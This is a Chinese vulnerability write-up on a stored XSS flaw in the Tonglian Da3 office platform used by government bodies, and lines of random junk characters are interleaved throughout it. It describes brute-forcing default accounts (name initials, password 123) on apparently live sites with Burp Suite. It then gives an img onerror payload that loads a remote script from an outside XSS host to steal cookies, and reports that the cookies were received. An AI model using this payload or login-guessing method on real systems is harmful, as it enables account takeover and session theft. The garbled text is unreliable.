, R# M& Y2 v4 a. y+ z U4 R. [
2 }/ q5 }) Z" k2 B, \) t4 N
同联Da3协同办公平台后台通用储存型xss漏洞
- K: Y; K. X& F7 p
( z- c* x1 @5 g ? ( \% W9 `% M3 @0 X- e* m- t
平台简介:6 i: q( w6 x0 N; a' l
8 |; B' X1 ^: C) ~
8 k. |6 F8 \4 Z: c 1 j( Q. a( y6 U2 R. x( l* K: w
5 E. S6 y5 D/ O- {6 ~6 `
. t# u' f' t' K+ \3 [" G( g/ O3 H/ X 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
8 y4 S! v! a4 Y2 A! ^9 H1 d& M5 {同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
1 J1 Z+ @9 o) e
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!6 O: [" G& \3 C! U3 @7 w8 [
0 l! }5 p r8 [3 h
& X$ T+ v/ I3 I' R& h$ u 8 y. L9 K# z4 e* @( ?+ z$ }
$ T- V8 y/ O1 `) Q3 ~, `
, C3 `! S$ ^" v, R& z) U 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:# O3 m$ a* B& H' J# b$ a- q
" \7 }1 C* j" V/ x: L! v9 v9 I; l
2 f) g" R" [* } [1 i2 Y) a , V( r3 {* w, P5 u/ p
1 _, W+ m3 ]* |3 Q
7 a1 [4 W: }( ^1 g http://1.1.1.1:7197/cap-aco/#(案例2-)
+ t r& t3 d' ], b
$ y% A0 r8 H3 s# E6 M V) R7 r
0 u+ k* s$ n: k
http://www.XXOO.com (案例1-官网网站)) F4 D& Y0 y& P; B. a3 o Q U
$ W2 b3 y# t* R: ]
5 Z/ P5 d g, y$ k: i
漏洞详情:$ G. @! v: E, `% h; \% U
$ Z* V7 P+ H& w" c
. o% A1 f0 ]; {) X: Z 案例一、
- o8 R/ J' t; k) U B
& m" k, C; p( g
B( x1 \% ^( ^5 T0 p6 S$ u
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
$ b8 U& z) x z ~
& C# P" a0 G1 ^' J# W* C9 u$ P
! V3 b7 Y4 }3 j4 m2 B& c* z" _7 A 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:! x* U$ F, b% M% U& {
& x2 K$ M7 D; G+ }9 {/ i 0 R' x5 M, |. \
" @9 E% Z! ^1 c/ D$ G% D) r2 z
! D& P0 a2 q) b+ D; ]# n: X r" j, d3 l P1 \# N
' k0 c, H4 G. P# m
2 O# x7 i2 m, r) s( D$ J
( X# T: I5 v5 Y" ]& Z
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
/ D: e. Y# U3 m) m4 P
- Y: @1 I$ _6 q5 R% a c" R4 Z
: I5 D5 D( H/ K- q) @
! _- R0 W) P- I& q2 N
5 [0 u3 H) ^$ q% P& m3 d% F1 T
+ c! F7 p* R$ R' \) {( G
2 L# f$ M- r2 k) E0 ?
" H1 O4 x6 j8 t- U7 E9 k5 T9 e5 h# X
* b+ g4 M2 T _* A9 W! i 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
9 h R" i+ h- T. d( P
. R2 ~9 c2 c1 `5 m# k) q4 w, Z* D 6 Q k% M5 k, \' T; Z! [
6 \' v# t: H# @# V
) O5 G- V7 J' a
1 D- H# H" m f1 I q7 Y <img src=x
# x3 A6 x5 x6 ]* ionerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
% t0 x! L4 `) _2 l
2 w4 p9 d- ~) V9 k( h
& p, K- U$ {/ _
. o. {, R* S& [
" T9 f! n) S9 Z1 \0 R" g
1 u) [! ?4 v! V5 T* m3 C 然后发送,接收cookie如图: , m& x1 K4 z5 }% `
# H+ t, `3 Y3 h4 {7 H( w! {( r! f+ p
; q, q& u& J3 F, F7 D7 ~
$ f8 L& B! ~( d
. m5 n3 k& g4 Q5 ^3 N
+ n7 ^/ s5 m+ z' C. L6 P. v
% E% V, D2 T' i( e' A0 w ~3 [
# I5 m' o: c Z0 O2 @1 i
: I* s7 P! z5 L0 @+ D/ \9 e% M
3 ?* J+ l, I3 n
6 q- u% U# {6 D% y X
& d3 b* @) y" c8 o' r9 e# k ; e( d1 r$ A7 e! z" i, f$ }
* B/ M6 l) t E. {/ B8 B/ ^
) q8 ~: i5 W% y& e
5 B/ s/ X. y& o; A- Q: }
: ?9 L4 G: S* y e: Z
% g/ w7 b* X4 P0 ^& J% E2 K8 B- `
; ]8 H2 f2 W b/ |- U
) [+ F6 t7 D2 I P $ v9 G, _7 R8 w+ W0 c% |: t4 [4 W
8 P- z6 s3 P# F8 [1 d
! N- Q3 V- \) `5 _$ x/ J; w) X
3 i* G2 M# y; o+ d 案例2、
! I4 ^# }* r6 Q
9 n9 ]4 c& ^1 f0 a9 u0 A* }
4 }5 x9 o; }* v% V2 Q, s 前面步骤都一样,下面看效果图:
! c: n. K7 g$ M3 ?! ~& H% o
2 a' a& I$ V$ S; G _& E o6 j7 ]
, J8 F9 |( ?8 C u3 [) X( G
5 J# M2 u2 T" S3 b
5 Q" N0 p* e# |, o- N, B$ I! O
( s5 h7 {) ]: l. j* [
2 G' D! N# F" j( F
$ j0 ^( T( U8 l5 x ! F8 ]- Y1 D4 b5 }
/ i1 q7 G+ C6 p, U& [( Z' a; Y% D
; i, B2 G5 j* b) @& y4 \
3 d6 Q: g0 ^) ~ V" B: w& \' R
! O: H3 C, @, t' X2 D
2 l- _- ~2 L/ ~0 v
1 @) c& v; g3 y0 g
* a% f$ D' C$ B3 s0 i8 x
$ ], f0 B" q" U3 Y4 G# h' P 6 |/ n R& ?8 d0 B: Y
5 g4 d( u; P! l
* j6 ~1 v9 [; Z; w( H. M) t! F
j2 ]2 K9 W4 i" @1 ]7 Q+ G 2 L |. q- e% _( v( j
" W' _. | L; o1 S# t' @% o
5 z2 F0 \$ S/ J, t# I
- M) o% ~4 y3 L7 s5 E- i# o7 X6 ^* F
3 b% A: Z; b$ b% }- K. I c7 B . N1 m, U6 J9 f* O4 e
$ a# T* z+ Y& x# j4 q2 S
( ?: P8 I) s$ u3 p" W